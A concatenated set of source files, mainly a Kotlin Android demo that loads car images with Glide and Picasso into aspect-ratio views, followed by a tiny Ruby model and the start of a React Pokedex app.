@BindingAdapter("app:imageUrlPicasso")
fun AspectRatioImageView.loadImagePicasso(url: String?) {
if (!url.isNullOrEmpty()) {
Picasso.get().load(url).into(this)
}
}
<file_sep>/app/src/main/java/com/mobilion/testimage/tabs/CardImageFragment.kt
package com.mobilion.testimage.tabs
import android.os.Bundle
import android.view.LayoutInflater
import android.view.View
import android.view.ViewGroup
import androidx.databinding.DataBindingUtil
import androidx.fragment.app.Fragment
import com.mobilion.testimage.R
import com.mobilion.testimage.adapter.MarginImageAdapter
import com.mobilion.testimage.databinding.FragmentCardImageBinding
import com.mobilion.testimage.fakedata.CarImages
class CardImageFragment : Fragment() {
private lateinit var binding: FragmentCardImageBinding
private lateinit var marginImageAdapter: MarginImageAdapter
override fun onCreateView(
inflater: LayoutInflater,
container: ViewGroup?,
savedInstanceState: Bundle?
): View {
binding =
DataBindingUtil.inflate(inflater, R.layout.fragment_card_image, container, false)
return binding.root
}
override fun onViewCreated(view: View, savedInstanceState: Bundle?) {
super.onViewCreated(view, savedInstanceState)
marginImageAdapter = MarginImageAdapter(CarImages.fakeDataMid())
binding.apply {
recyclerView.adapter = marginImageAdapter
}
}
}
<file_sep>/app/src/main/java/com/mobilion/testimage/adapter/TabPagerAdapter.kt
package com.mobilion.testimage.adapter
import androidx.fragment.app.Fragment
import androidx.fragment.app.FragmentManager
import androidx.lifecycle.Lifecycle
import androidx.viewpager2.adapter.FragmentStateAdapter
import com.mobilion.testimage.tabs.CardImageFragment
import com.mobilion.testimage.tabs.NetworkImageFragment
import com.mobilion.testimage.tabs.SolveImageFragment
import com.mobilion.testimage.tabs.TroubleImageFragment
class TabPagerAdapter(fragmentManager: FragmentManager, lifecycle: Lifecycle) :
FragmentStateAdapter(fragmentManager, lifecycle) {
override fun getItemCount(): Int {
return 4
}
override fun createFragment(position: Int): Fragment {
return when (position) {
0 -> {
TroubleImageFragment()
}
1 -> {
SolveImageFragment()
}
2 -> {
NetworkImageFragment()
}
3 -> {
CardImageFragment()
}
else -> {
Fragment()
}
}
}
}
<file_sep>/app/src/main/java/com/mobilion/testimage/fakedata/RequestType.kt
package com.mobilion.testimage.fakedata
enum class RequestType(val value: Int) {
GLIDE(0),
PICASSO(1);
companion object {
fun find(value: Int) = when (value) {
0 -> GLIDE
1 -> PICASSO
else -> throw Exception()
}
}
}
<file_sep>/README.md
# testImage
Solves image scale problems with Aspect Ratio.
<file_sep>/app/src/main/java/com/mobilion/testimage/adapter/MarginImageAdapter.kt
package com.mobilion.testimage.adapter
import android.view.LayoutInflater
import android.view.ViewGroup
import androidx.recyclerview.widget.RecyclerView
import com.mobilion.testimage.databinding.ItemCarWithMarginBinding
import com.mobilion.testimage.extensions.loadImageGlide
import com.mobilion.testimage.extensions.loadImagePicasso
import com.mobilion.testimage.fakedata.CarImage
import com.mobilion.testimage.fakedata.RequestType
import com.mobilion.testimage.platform.BaseListAdapter
import com.mobilion.testimage.platform.BaseViewHolder
class MarginImageAdapter(
private var carImages: ArrayList<CarImage>,
) : BaseListAdapter<CarImage>(
itemsSame = { old, new -> old == new },
contentsSame = { old, new -> old == new }
) {
override fun onCreateViewHolder(
parent: ViewGroup,
inflater: LayoutInflater,
viewType: Int
): RecyclerView.ViewHolder {
return MarginImageViewHolder(parent, inflater)
}
override fun onBindViewHolder(holder: RecyclerView.ViewHolder, position: Int) {
when (holder) {
is MarginImageViewHolder -> {
holder.bind(carImages[position])
}
}
}
fun addData(addData: List<CarImage>) {
carImages = ArrayList(addData)
}
override fun getItemCount(): Int {
return carImages.size
}
}
class MarginImageViewHolder(parent: ViewGroup, inflater: LayoutInflater) :
BaseViewHolder<ItemCarWithMarginBinding>(
ItemCarWithMarginBinding.inflate(inflater, parent, false)
) {
fun bind(carImage: CarImage) {
binding.apply {
item = carImage
when (carImage.type) {
RequestType.GLIDE -> imageView.loadImageGlide(carImage.imgUrl)
RequestType.PICASSO -> imageView.loadImagePicasso(carImage.imgUrl)
}
executePendingBindings()
}
}
}
<file_sep>/app/src/main/java/com/mobilion/testimage/fakedata/CarImage.kt
package com.mobilion.testimage.fakedata
data class CarImage(
var id: Int = 0,
var type: RequestType,
var imgUrl: String = "",
var title: String = ""
)
object CarImages {
fun fakeDataHigh(): ArrayList<CarImage> {
val list = arrayListOf(
CarImage(
0,
RequestType.GLIDE,
"https://i.ibb.co/rGqKRhH/bmw-front-2-1920x1080.jpg"
),
CarImage(
1,
RequestType.GLIDE,
"https://i.ibb.co/rZ6TJqf/bmw-front-left-1920x1080.jpg"
),
CarImage(
2,
RequestType.GLIDE,
"https://i.ibb.co/9W7mqGh/bmw-front-right-1920x1080.jpg"
),
CarImage(
3,
RequestType.GLIDE,
"https://i.ibb.co/LpzDyN0/bmw-inside-1-1920x1080.jpg"
),
CarImage(
4,
RequestType.GLIDE,
"https://i.ibb.co/hBwbzrG/bmw-inside-2-1920x1080.jpg"
),
CarImage(
5,
RequestType.PICASSO,
"https://i.ibb.co/SfQggpw/bmw-inside-3-1920x1080.jpg"
),
CarImage(
6,
RequestType.PICASSO,
"https://i.ibb.co/JqR70WS/bmw-left-side-1920x1080.jpg"
),
CarImage(
7,
RequestType.PICASSO,
"https://i.ibb.co/PjDPhHs/bmw-street-1920x1080.jpg"
),
CarImage(
8,
RequestType.PICASSO,
"https://i.ibb.co/9ZTVsDx/bmw-wide-1920x1080.jpg"
),
CarImage(
9,
RequestType.PICASSO,
"https://i.ibb.co/Jd5Z3cR/bmw-front-1-1920x1080.jpg"
)
)
list.forEach {
it.title = "[1920X1080] ${it.type.name}"
}
return list
}
fun fakeDataMid(): ArrayList<CarImage> {
val list = arrayListOf(
CarImage(
0,
RequestType.GLIDE,
"https://i.ibb.co/VqfD0C1/bmw-wide-1280x720.jpg"
),
CarImage(
1,
RequestType.GLIDE,
"https://i.ibb.co/JtZTR0T/bmw-front-1-1280x720.jpg"
),
CarImage(
2,
RequestType.GLIDE,
"https://i.ibb.co/HX4HHM7/bmw-front-2-1280x720.jpg"
),
CarImage(
3,
RequestType.GLIDE,
"https://i.ibb.co/m5WtF9N/bmw-front-left-1280x720.jpg"
),
CarImage(
4,
RequestType.GLIDE,
"https://i.ibb.co/ZLkDSS0/bmw-front-right-1280x720.jpg"
),
CarImage(
5,
RequestType.PICASSO,
"https://i.ibb.co/m893PcP/bmw-street-1280x720.jpg"
),
CarImage(
6,
RequestType.PICASSO,
"https://i.ibb.co/tqZb2Zk/bmw-inside-1-1280x720.jpg"
),
CarImage(
7,
RequestType.PICASSO,
"https://i.ibb.co/y8Tr1bQ/bmw-inside-2-1280x720.jpg"
),
CarImage(
8,
RequestType.PICASSO,
"https://i.ibb.co/KWnW8m3/bmw-inside-3-1280x720.jpg"
),
CarImage(
9,
RequestType.PICASSO,
"https://i.ibb.co/FqzL2Sg/bmw-left-side-1280x720.jpg"
)
)
list.forEach {
it.title = "[1280X720] ${it.type.name}"
}
return list
}
fun fakeDataLow(): ArrayList<CarImage> {
val list = arrayListOf(
CarImage(
0,
RequestType.GLIDE,
"https://i.ibb.co/VWyDXNw/bmw-front-1-1024x576.jpg"
),
CarImage(
1,
RequestType.GLIDE,
"https://i.ibb.co/ZVsct0w/bmw-front-2-1024x576.jpg"
),
CarImage(
2,
RequestType.GLIDE,
"https://i.ibb.co/zJQQQ5R/bmw-front-left-1024x576.jpg"
),
CarImage(
3,
RequestType.GLIDE,
"https://i.ibb.co/L91xBZX/bmw-front-right-1024x576.jpg"
),
CarImage(
4,
RequestType.GLIDE,
"https://i.ibb.co/TqzgMDp/bmw-inside-1-1024x576.jpg"
),
CarImage(
5,
RequestType.PICASSO,
"https://i.ibb.co/Z1KTBfx/bmw-inside-2-1024x576.jpg"
),
CarImage(
6,
RequestType.PICASSO,
"https://i.ibb.co/tLdpw4x/bmw-inside-3-1024x576.jpg"
),
CarImage(
7,
RequestType.PICASSO,
"https://i.ibb.co/T4bcmJP/bmw-left-side-1024x576.jpg"
),
CarImage(
8,
RequestType.PICASSO,
"https://i.ibb.co/WFxhGhp/bmw-street-1024x576.jpg"
),
CarImage(
9,
RequestType.PICASSO,
"https://i.ibb.co/hYJCTck/bmw-wide-1024x576.jpg"
)
)
list.forEach {
it.title = "[1024X576] ${it.type.name}"
}
return list
}
}
|
40fe4c91064799156e481404868f47c1253fd5a3
|
[
"Markdown",
"Kotlin",
"Gradle"
] | 9
|
Kotlin
|
svlilyas/testImage
|
85095d87f525f5e0b70a90c640a791f52cb5edc7
|
b83884d8e5c7feabd944d8980555336768e13236
|
refs/heads/master
|
<repo_name>KazumasaNagae/test_nge<file_sep>/app/models/country.rb
class Country < ActiveRecord::Base
def many_or_few
if self.population > 1000
'many'
else
'few'
end
end
end
|
69c21fbe5fe9a46d54e40f9b6e56529b1ba875c6
|
[
"Ruby"
] | 1
|
Ruby
|
KazumasaNagae/test_nge
|
f94295d51496adc035afec2e864601adc6f89851
|
746183fc7fcd430f8a9a8425a12c62ec9afbc192
|
refs/heads/master
|
<repo_name>SpencerSharkey/pointshop-tmysql<file_sep>/lua/providers/tmysql.lua
--[[
PointShop tMySQL Adapter by <NAME>
Should work, and has verbose output.
Adapted from _Undefined's pointshop-mysql
Once configured, change PS.Config.DataProvider = 'pdata' to PS.Config.DataProvider = 'tmysql' in pointshop's sh_config.lua.
]]--
-- config, change these to match your setup
local mysql_hostname = 'localhost' -- Your MySQL server address.
local mysql_username = 'root' -- Your MySQL username.
local mysql_password = '' -- Your MySQL password.
local mysql_database = 'pointshop' -- Your MySQL database.
local mysql_port = 3306 -- Your MySQL port. Most likely is 3306.
-- end config, don't change anything below unless you know what you're doing
require('tmysql4')
PROVIDER.Fallback = "pdata"
local db, err = tmysql.initialize(mysql_hostname, mysql_username, mysql_password, mysql_database, mysql_port)
if (err) then
print("Error connecting to MySQL:")
ErrorNoHalt(err)
else
function PROVIDER:GetData(ply, callback)
local qs = string.format("SELECT * FROM `pointshop_data` WHERE uniqueid='%s'", ply:UniqueID())
db:Query(qs, function(res, pass, err)
if (not pass) then ErrorNoHalt("[PSMySQL-GetData] "..err) return end
if (#res < 1) then callback(0, {}) return end
local row = res[1]
print("[PSMySQL-GetData] "..ply:UniqueID())
callback(row.points or 0, util.JSONToTable(row.items or '{}'))
end, QUERY_FLAG_ASSOC)
end
function PROVIDER:SetPoints(ply, points)
local qs = string.format("INSERT INTO `pointshop_data` (uniqueid, points, items) VALUES ('%s', '%s', '[]') ON DUPLICATE KEY UPDATE points = VALUES(points)", ply:UniqueID(), points or 0)
db:Query(qs, function(res, pass, err)
if (not pass) then ErrorNoHalt("[PSMySQL-SetPoints] "..err) return end
print("[PSMySQL-SetPoints] "..ply:UniqueID().."="..points)
end, QUERY_FLAG_ASSOC)
end
function PROVIDER:GivePoints(ply, points)
local qs = string.format("INSERT INTO `pointshop_data` (uniqueid, points, items) VALUES ('%s', '%s', '[]') ON DUPLICATE KEY UPDATE points = points + VALUES(points)", ply:UniqueID(), points or 0)
db:Query(qs, function(res, pass, err)
if (not pass) then ErrorNoHalt("[PSMySQL-GivePoints] "..err) return end
print("[PSMySQL-GivePoints] "..ply:UniqueID().."+="..points)
end, QUERY_FLAG_ASSOC)
end
function PROVIDER:TakePoints(ply, points)
local qs = string.format("INSERT INTO `pointshop_data` (uniqueid, points, items) VALUES ('%s', '%s', '[]') ON DUPLICATE KEY UPDATE points = points - VALUES(points)", ply:UniqueID(), points or 0)
db:Query(qs, function(res, pass, err)
if (not pass) then ErrorNoHalt("[PSMySQL-TakePoints] "..err) return end
print("[PSMySQL-TakePoints] "..ply:UniqueID().."-="..points)
end, QUERY_FLAG_ASSOC)
end
function PROVIDER:SaveItem(ply, item_id, data)
self:GiveItem(ply, item_id, data)
end
function PROVIDER:GiveItem(ply, item_id, data)
local tmp = table.Copy(ply.PS_Items)
tmp[item_id] = data
local qs = string.format("INSERT INTO `pointshop_data` (uniqueid, points, items) VALUES ('%s', '0', '%s') ON DUPLICATE KEY UPDATE items = VALUES(items)", ply:UniqueID(), tmysql.escape(util.TableToJSON(tmp)))
db:Query(qs, function(res, pass, err)
if (not pass) then ErrorNoHalt("[PSMySQL-GiveItem] "..err) return end
print("[PSMySQL-GiveItem] "..ply:UniqueID().."="..item_id)
end, QUERY_FLAG_ASSOC)
end
function PROVIDER:TakeItem(ply, item_id)
local tmp = table.Copy(ply.PS_Items)
tmp[item_id] = nil
local qs = string.format("INSERT INTO `pointshop_data` (uniqueid, points, items) VALUES ('%s', '0', '%s') ON DUPLICATE KEY UPDATE items = VALUES(items)", ply:UniqueID(), tmysql.escape(util.TableToJSON(tmp)))
db:Query(qs, function(res, pass, err)
if (not pass) then ErrorNoHalt("[PSMySQL-TakeItem] "..err) return end
print("[PSMySQL-TakeItem] "..ply:UniqueID().."="..item_id)
end, QUERY_FLAG_ASSOC)
end
function PROVIDER:SetData(ply, points, items)
local qs = string.format("INSERT INTO `pointshop_data` (uniqueid, points, items) VALUES ('%s', '%s', '%s') ON DUPLICATE KEY UPDATE points = VALUES(points), items = VALUES(items)", ply:UniqueID(), points or 0, tmysql.escape(util.TableToJSON(items)))
db:Query(qs, function(res, pass, err)
if (not pass) then ErrorNoHalt("[PSMySQL-SetData] "..err) return end
print("[PSMySQL-SetData] "..ply:UniqueID())
end, QUERY_FLAG_ASSOC)
end
end
<file_sep>/README.md
pointshop-tmysql
================
MySQL adapter for PointShop that uses [tmysql4](https://code.google.com/p/blackawps-glua-modules/source/browse/#hg%2Fgm_tmysql4_boost%2FRelease) by Blackawps.
Install this folder as a separate addon. (Place entire `pointshop-tmysql` folder in `garrysmod/addons`)
MySQL providers for pointshop are useful if you want to share data across multiple servers, or store it for access from different applications such as a website or donation system.
tMySQL4 Installation
================
Get tmysql4 from [Blackawps's Google Code](https://code.google.com/p/blackawps-glua-modules/source/browse/#hg%2Fgm_tmysql4_boost%2FRelease)
It's Windows AND Linux compatible! Make sure you install the correct libraries.
You must place the libraries from `libs.rar` ([link](https://blackawps-glua-modules.googlecode.com/hg/gm_tmysql4_boost/Release/libs.rar)) next to your SRCDS executable, which is located in the same folder as the `garrysmod` folder within your server installation.
You must also place either gm_tmysql4_win32.dll or gmsv_tmysql4_linux.dll in your `garrysmod/lua/bin` folder depending on your server's operating system: `win32` for Windows and `linux` for Linux.
Windows server users might also need to install the [Microsoft Visual C++ 2008 Redistributable Package](http://www.microsoft.com/en-us/download/details.aspx?id=29) for the module to operate properly. If it is not installed, the server will crash on startup. The package contains libraries tMySQL requires at runtime and installs them automatically for you.
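Before moving on to configuration, it can be worth confirming that the module actually loads. The snippet below is a minimal sketch and not part of this addon: it assumes tmysql4 is installed as described above, and can be run from a temporary server-side script (or pasted via GMod's `lua_run` console command).

```lua
-- Minimal load check (assumes tmysql4 is installed in garrysmod/lua/bin)
local ok, err = pcall(require, "tmysql4")
if ok then
    print("tmysql4 loaded successfully")
else
    print("tmysql4 failed to load: " .. tostring(err))
end
```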
Configuration
================
1. Execute the `pointshop.sql` file on the database you are configuring for use with PointShop. phpMyAdmin and most other MySQL client applications have an import feature for this.
2. Navigate to `lua/providers/tmysql.lua` within the addon folder and modify the MySQL connection information at the top of the file.
3. Edit PointShop's `sh_config.lua`: change `PS.Config.DataProvider = 'pdata'` to `PS.Config.DataProvider = 'tmysql'` (see the sketch after this list).
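As a concrete illustration of steps 2 and 3, the edited lines might end up looking like the sketch below. All credential values are placeholders for your own server; the variable names come from `lua/providers/tmysql.lua` in this addon and from PointShop's `sh_config.lua`.

```lua
-- lua/providers/tmysql.lua (top of the file), with placeholder credentials
local mysql_hostname = 'db.example.com' -- your MySQL server address
local mysql_username = 'pointshop'      -- your MySQL username
local mysql_password = 'changeme'       -- your MySQL password
local mysql_database = 'pointshop'      -- your MySQL database
local mysql_port     = 3306             -- your MySQL port

-- PointShop's sh_config.lua: switch the data provider to this adapter
PS.Config.DataProvider = 'tmysql'
```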
The MySQL server you are using must allow remote connections for the user provided. If you are using a web service like cPanel to manage your database, [here](http://www.liquidweb.com/kb/enable-remote-mysql-connections-in-cpanel/) is a helpful tutorial. If you're using a standalone MySQL server installation on a separate server, [here](http://www.cyberciti.biz/tips/how-do-i-enable-remote-access-to-mysql-database-server.html) is a tutorial that will help you.
Some game server providers include MySQL databases with their servers; talk to your support agents for help setting them up if you do not already know how.
Credits
================
Adaptation by <NAME> (<EMAIL>)
Adapted from adamdburton/pointshop-mysql
|
ae5b43be25495d47ca23db61987654cf65506d60
|
[
"Markdown",
"Lua"
] | 2
|
Lua
|
SpencerSharkey/pointshop-tmysql
|
36b453598f07dfb9e803a7aabc5b01aa97506ed1
|
5c7eeb47b0bc4279603db35ae22f790c19db1f3a
|
refs/heads/master
|
<repo_name>EliezerJD/backRFID<file_sep>/rfid/models.py
from django.db import models
# Create your models here.
class rfid(models.Model):
codigo = models.IntegerField(null=False)
status = models.CharField(max_length=100, null=False)
idalumno = models.CharField(max_length=10, null=True)
def __str__(self):
return str(self.codigo)  # model has no "name" field; use the RFID code
class Meta:
db_table = 'rfid'
<file_sep>/requirements.txt
Django==2.2.10
pytz==2019.3
sqlparse==0.3.0
django-cors-headers==2.2.1
<file_sep>/rfid/serializers.py
from rest_framework import serializers
from rfid.models import rfid
class RfidSerializer(serializers.ModelSerializer):
class Meta:
model = rfid
fields = ('__all__')
<file_sep>/alumno/urls.py
from django.urls import include, path, re_path
from rest_framework import routers
from alumno import views
from alumno import serializers
urlpatterns = [
re_path(r'^alumno/$', views.AlumnoList.as_view()),
re_path(r'^alumno/(?P<pk>\d+)$', views.AlumnoDetail.as_view()),
]
<file_sep>/rfid/migrations/0002_auto_20200326_0029.py
# Generated by Django 3.0.4 on 2020-03-26 00:29
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('rfid', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='rfid',
name='idalumno',
field=models.CharField(max_length=10, null=True),
),
]
<file_sep>/alumno/models.py
from django.db import models
from django.utils import timezone
# Create your models here.
class alumno(models.Model):
nombre = models.CharField(max_length=100, null=False)
ap_pat = models.CharField(max_length=100, null=False)
ap_mat = models.CharField(max_length=100, null=False)
fecha = models.DateTimeField(default = timezone.now)
idrfid = models.CharField(max_length=10, null=True)
def __str__(self):
return self.nombre
class Meta:
db_table = 'alumno'
<file_sep>/rfid/urls.py
from django.urls import include, path, re_path
from rest_framework import routers
from rfid import views
from rfid import serializers
urlpatterns = [
re_path(r'^rfid/$', views.RfidList.as_view()),
re_path(r'^rfid/(?P<pk>\d+)$', views.RfidDetail.as_view()),
]
<file_sep>/alumno/views.py
from django.shortcuts import render
from django.http import Http404
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from rest_framework import generics
from alumno.models import alumno
from alumno.serializers import AlumnoSerializer
# Create your views here.
class AlumnoList(APIView):
def get(self, request, format=None):
queryset = alumno.objects.all()
serializer = AlumnoSerializer(queryset, many=True, context = {'request':request})
return Response(serializer.data)
def post(self, request, format=None):
serializer = AlumnoSerializer(data= request.data)
if serializer.is_valid():
serializer.save()
datas = serializer.data
return Response (datas)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class AlumnoDetail(APIView):
def get_object(self,pk):
try:
return alumno.objects.get(pk=pk)
except alumno.DoesNotExist:
raise Http404
def get(self, request,pk, format=None):
alumno = self.get_object(pk)
serializer = AlumnoSerializer(alumno)
return Response(serializer.data)
def put(self, request,pk, format=None):
alumno = self.get_object(pk)
serializer = AlumnoSerializer(alumno, data = request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def delete(self, request, pk, format=None):
alumno = self.get_object(pk)
alumno.delete()
return Response('Eliminado')
<file_sep>/rfid/views.py
# Create your views here.
from django.shortcuts import render
from django.http import Http404
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from rest_framework import generics
from rfid.models import rfid
from rfid.serializers import RfidSerializer
# Create your views here.
class RfidList(APIView):
def get(self, request, format=None):
queryset = rfid.objects.all()
serializer = RfidSerializer(queryset, many=True, context = {'request':request})
return Response(serializer.data)
def post(self, request, format=None):
serializer = RfidSerializer(data= request.data)
if serializer.is_valid():
serializer.save()
datas = serializer.data
return Response (datas)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class RfidDetail(APIView):
def get_object(self,pk):
try:
return rfid.objects.get(pk=pk)
except rfid.DoesNotExist:
raise Http404
def get(self, request,pk, format=None):
rfid = self.get_object(pk)
serializer = RfidSerializer(rfid)
return Response(serializer.data)
def put(self, request,pk, format=None):
rfid = self.get_object(pk)
serializer = RfidSerializer(rfid, data = request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def delete(self, request, pk, format=None):
rfid = self.get_object(pk)
rfid.delete()
return Response('Eliminado')
<file_sep>/asistencia/views.py
from django.shortcuts import render
from django.http import Http404
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from rest_framework import generics
from asistencia.models import asistencia
from asistencia.serializers import AsistenciaSerializer
# Create your views here.
class AsistenciaList(APIView):
def get(self, request, format=None):
queryset = asistencia.objects.all()
serializer = AsistenciaSerializer(queryset, many=True, context = {'request':request})
return Response(serializer.data)
def post(self, request, format=None):
serializer = AsistenciaSerializer(data= request.data)
if serializer.is_valid():
serializer.save()
datas = serializer.data
return Response (datas)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class AsistenciaDetail(APIView):
def get_object(self,pk):
try:
return asistencia.objects.get(pk=pk)
except asistencia.DoesNotExist:
raise Http404
def get(self, request,pk, format=None):
asistencia = self.get_object(pk)
serializer = AsistenciaSerializer(asistencia)
return Response(serializer.data)
def put(self, request,pk, format=None):
asistencia = self.get_object(pk)
serializer = AsistenciaSerializer(asistencia, data = request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def delete(self, request, pk, format=None):
asistencia = self.get_object(pk)
asistencia.delete()
return Response('Eliminado')
<file_sep>/asistencia/models.py
from django.db import models
from django.utils import timezone
# Create your models here.
class asistencia(models.Model):
fecha = models.DateTimeField(default = timezone.now)
idalumno = models.CharField(max_length=10, null=False)
def __str__(self):
return str(self.idalumno)  # model has no "name" field; use the student id
class Meta:
db_table = 'asistencia'
<file_sep>/alumno/migrations/0002_auto_20200325_2348.py
# Generated by Django 3.0.4 on 2020-03-25 23:48
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('alumno', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='alumno',
name='idrfid',
field=models.CharField(max_length=10, null=True),
),
]
<file_sep>/asistencia/urls.py
from django.urls import include, path, re_path
from rest_framework import routers
from asistencia import views
from asistencia import serializers
urlpatterns = [
re_path(r'^asistencia/$', views.AsistenciaList.as_view()),
re_path(r'^asistencia/(?P<pk>\d+)$', views.AsistenciaDetail.as_view()),
]
|
d343d7e7a3300fdbb80d5aaf2d680f96703a9774
|
[
"Python",
"Text"
] | 13
|
Python
|
EliezerJD/backRFID
|
52646c87c47dc7fa789a1095dfa4f60adab2858e
|
a693c92a15a4b01aca008d22da9d6a2ca8f355fd
|
refs/heads/master
|
<repo_name>mesalvav/project3real<file_sep>/server/routes/dishRouter.js
const express = require('express');
const router = express.Router();
const Dish = require('../models/dishes')
const uploadCloud = require('../config/cloudinary-setup.js');
/* all dishes */
router.get('/', (req, res, next) => {
Dish.find().populate({path:'comments', model:'Comment', populate:{path:'author',model:'User'}})
.then( dishesList =>{
res.status(200).json(dishesList );
})
.catch(err =>{
console.log(err);
})
});
router.get('/:dishid', (req, res, next) => {
console.log(" "+ req.params.dishid);
Dish.findById(req.params.dishid).populate('comments')
.then( dishesx =>{
res.status(200).json(dishesx );
})
.catch(err =>{
console.log(err);
})
});
router.post('/uploadnewdish', uploadCloud.single('photo'), (req,res,next) => {
console.log('line 12 post upload: ' + JSON.stringify( req.body));
const {
name,
description,
category,
label,
price,
featured
} = req.body;
const image = req.file.url;
const newDish =
new Dish({name,
description,
image,
category,
label,
price,
featured});
newDish.save()
.then(dish =>{
res.status(200).json({ result: " saved & uploaded dish here"});
})
.catch(err => { console.log("err is " + err)})
})
module.exports = router;<file_sep>/client/src/shared/promotions.js
export const PROMOTIONS = [
{
id: 0,
name: '<NAME>',
image: '/assets/images/buffet.png',
label: 'New',
price: '8.97',
featured: true,
description: 'Many ingredients typically served in clay pots, from which guests pick their favorites to make their own tortillas. All for just $8.97 per person'
}
];<file_sep>/server/public/precache-manifest.eb206d3b6e7add6af399744082694c5b.js
self.__precacheManifest = (self.__precacheManifest || []).concat([
{
"revision": "c29be1e2f93c1837a0bc3412ede5d619",
"url": "/index.html"
},
{
"revision": "a82e70f69381d8daf5b7",
"url": "/static/css/2.57008913.chunk.css"
},
{
"revision": "2f2917ded4d254478459",
"url": "/static/css/main.fa30e90f.chunk.css"
},
{
"revision": "a82e70f69381d8daf5b7",
"url": "/static/js/2.6b1ed1db.chunk.js"
},
{
"revision": "2f2917ded4d254478459",
"url": "/static/js/main.4b0b797f.chunk.js"
},
{
"revision": "42ac5946195a7306e2a5",
"url": "/static/js/runtime~main.a8a9905a.js"
},
{
"revision": "674f50d287a8c48dc19ba404d20fe713",
"url": "/static/media/fontawesome-webfont.674f50d2.eot"
},
{
"revision": "912ec66d7572ff821749319396470bde",
"url": "/static/media/fontawesome-webfont.912ec66d.svg"
},
{
"revision": "af7ae505a9eed503f8b8e6982036873e",
"url": "/static/media/fontawesome-webfont.af7ae505.woff2"
},
{
"revision": "b06871f281fee6b241d60582ae9369b9",
"url": "/static/media/fontawesome-webfont.b06871f2.ttf"
},
{
"revision": "fee66e712a8a08eef5805a46892932ad",
"url": "/static/media/fontawesome-webfont.fee66e71.woff"
}
]);<file_sep>/server/routes/commentRouter.js
const express = require('express');
const router = express.Router();
const Comment = require('../models/comments');
const Dish = require('../models/dishes');
/* GET home page */
router.get('/:dishid', (req, res, next) => {
Dish.findById(req.params.dishid).populate('comments')
.then(dishx => {
res.status(200).json(dishx.comments );
})
.catch(err=>console.log(err))
});
router.post('/addcomment', (req, res, next) => {
const { rating , comment, author, dishid } = req.body;
Comment.create({rating: rating, comment: comment, author: author})
.then((commentx)=>{
Dish.findByIdAndUpdate(dishid, { $push:{comments: commentx._id}})
.then((response)=>{ res.json({response, commentx}) })
.catch(err=>{ res.json(err) });
})
.catch(err=>{ res.json(err) });
});
router.delete('/deletecomment/:commentid', (req, res, next) => {
// const { dishid, commentid } = req.body;
Comment.findByIdAndRemove(req.params.commentid)
.then((response=>{
res.status(200).json(response);
}))
.catch(err=>console.log(err))
// Dish.findById(dishid)
// .then((dishx)=>{
// // const indexofdishx = dishx.comments.findIndex(commentid);
// let comms = [...dishx.comments];
// let filtered = comms.filter(ele=> ele._id.toString() === commentid );
// res.status(200).json({filtered, commentid});
// })
// .catch( err=>{ res.json(err) } );
})
router.post('/updatecomment', (req, res, next) => {
const { commentid, rating, comment } = req.body;
Comment.findByIdAndUpdate(commentid, {rating:rating, comment: comment})
.then((response=>{
res.status(200).json(response);
}))
.catch(err=>console.log(err))
})
module.exports = router;<file_sep>/client/src/services/commentService.js
import axios from 'axios';
// baseURL: 'http://localhost:5000/api/comments',
class CommentService {
constructor(){
let service = axios.create({
baseURL: `${process.env.REACT_APP_API_URL}/comments`,
withCredentials: true,
});
this.service = service;
}
addNewComment = (rating, comment, author, dishid)=> {
return this.service.post('/addcomment', {
rating: rating, comment: comment, author: author, dishid
})
.then(response => response.data)
.catch(err=>console.log(err))
}
// deleteComment = (dishid, commentid)=>{
// return this.service.post('deletecomment', {dishid,commentid })
// .then(response=>response.data)
// .catch(err=>{console.log(err)})
// }
deleteComment = (commentid)=>{
return this.service.delete('deletecomment/'+commentid)
.then(response=>response.data)
.catch(err=>{console.log(err)})
}
updateComment = (commentid, rating, comment)=>{
return this.service.post('updatecomment', {commentid, rating, comment})
.then(response=>response.data)
.catch(err=>console.log(err))
}
}
export default CommentService;<file_sep>/server/README.md
# back-end-restaurant
|
74a78d3dfa71614e443d21b187bf58cffa36bd41
|
[
"JavaScript",
"Markdown"
] | 6
|
JavaScript
|
mesalvav/project3real
|
b297055707c194eaa67e06ab6a7fd2292e9a9ee8
|
fb65abfb72e1c09e58eed6bc833b97a74d8413c2
|
refs/heads/master
|
<repo_name>jceballos29/poke-app<file_sep>/src/components/CardContainer.js
import React, { useEffect, useState } from "react";
import Card from "./Card";
import "../css/CardContainer.css";
function CardContainer({ pokemons }) {
const [renderList, setRenderList] = useState([]);
useEffect(() => {
if (pokemons) {
setRenderList(
pokemons.map((pokemon, index) => <Card key={index} url={pokemon.url} />)
);
console.log(pokemons[0]);
}
}, [pokemons]);
return <div className="CardContainer">{renderList}</div>;
}
export default CardContainer;
<file_sep>/src/components/Pokedex.js
import React, { useEffect, useState } from "react";
import TrainerCard from "./TrainerCard";
import "../css/PokeContainer.css";
import SearchBar from "./SearchBar";
import axios from "axios";
import Container from "./Container";
import { useAuth } from "../Context/AuthProvider";
function Pokedex() {
const { user } = useAuth();
const [types, setTypes] = useState([]);
const [name, setName] = useState("Ash");
const [gender, setGender] = useState("male");
useEffect(() => {
const getTypes = async () => {
axios
.get("https://pokeapi.co/api/v2/type")
.then((response) => setTypes(response.data.results))
};
getTypes();
}, []);
useEffect(() => {
if (user) {
setName(user.name);
setGender(user.gender);
}
}, [user]);
return (
<div className="PokeContainer">
<TrainerCard
gender={gender}
user={name}
id={Math.floor(Math.random() * (90000 - 10000) + 10000)}
/>
<SearchBar types={types} />
<Container />
</div>
);
}
export default Pokedex;
<file_sep>/src/components/PorfileItem.js
import React from "react";
function PorfileItem({ name, value }) {
return (
<div className="PorfileItem">
